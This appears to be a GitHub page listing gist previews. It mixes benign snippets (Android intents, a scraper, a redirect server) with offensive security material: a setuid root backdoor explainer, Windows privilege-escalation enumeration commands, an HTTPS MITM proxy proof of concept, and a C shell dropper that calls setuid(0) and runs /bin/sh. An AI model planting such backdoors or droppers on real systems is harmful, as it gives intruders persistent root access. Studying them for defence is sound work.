MichaellCader michaellcader

@solarsailer
solarsailer / URLScheme Android
Created June 14, 2011 13:54
Basic implementation of URL scheme in Android
--- Manifest ---
<activity android:name=".URLScheme">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data
android:scheme="http"
android:host="www.a_url.com"
android:pathPrefix="/a_path" />
@taviso
taviso / pmftool.c
Created February 27, 2013 19:55
Quick tool to generate PMF files for process monitor without having to use the GUI.
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdbool.h>
#include <iconv.h>
#include <string.h>
#include <assert.h>
// Quick utility to generate Process Monitor filter sets for testing.
// Tavis Ormandy <[email protected]>
@dergachev
dergachev / setuid-root-backdoor.md
Last active September 2, 2024 12:08
How to use setuid to install a root backdoor.

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job, I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of the Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account on the system (including www-data, which you might not even know is compromised).

If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

@sckalath
sckalath / windows_privesc
Last active February 12, 2025 08:58
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@cryptix
cryptix / vineScrape.go
Created August 27, 2014 12:31
extract a javascript object value from a html page using goquery and otto
package main
import (
"errors"
"log"
"os"
"github.com/PuerkitoBio/goquery"
"github.com/robertkrimen/otto"
)
@darkwave
darkwave / AndroidDataReceiver.pde
Last active April 7, 2023 12:03
How to receive Android Intent data from another App using Processing
/*
For more information visit Android developer portal http://developer.android.com/training/sharing/receive.html
*/
import android.graphics.BitmapFactory;
import android.graphics.Bitmap;
import java.io.InputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import android.content.Intent;
@stevenswafford
stevenswafford / google-dorks
Created June 6, 2015 05:57
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@greim
greim / https-mitm-proxy-poc.js
Last active September 18, 2022 06:44
HTTPS MITM Proxy Proof of Concept
import https from 'https'
import http from 'http'
import url from 'url'
import adapt from 'ugly-adapter' // callback => promise adapter; need to npm install this
import tls from 'tls'
import net from 'net'
import fs from 'fs'
import os from 'os'
import path from 'path'
import childProcess from 'child_process'
@PythEch
PythEch / poc.md
Last active July 11, 2022 00:46
MobileCydia.mm Race Condition LPE

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}
@shreddd
shreddd / redirect.py
Created September 30, 2015 21:14
Simple Redirect Server in python to redirect requests to a specified URL
#!/usr/bin/env python
"""
Simple HTTP URL redirector
Shreyas Cholia 10/01/2015
usage: redirect.py [-h] [--port PORT] [--ip IP] redirect_url
HTTP redirect server
positional arguments: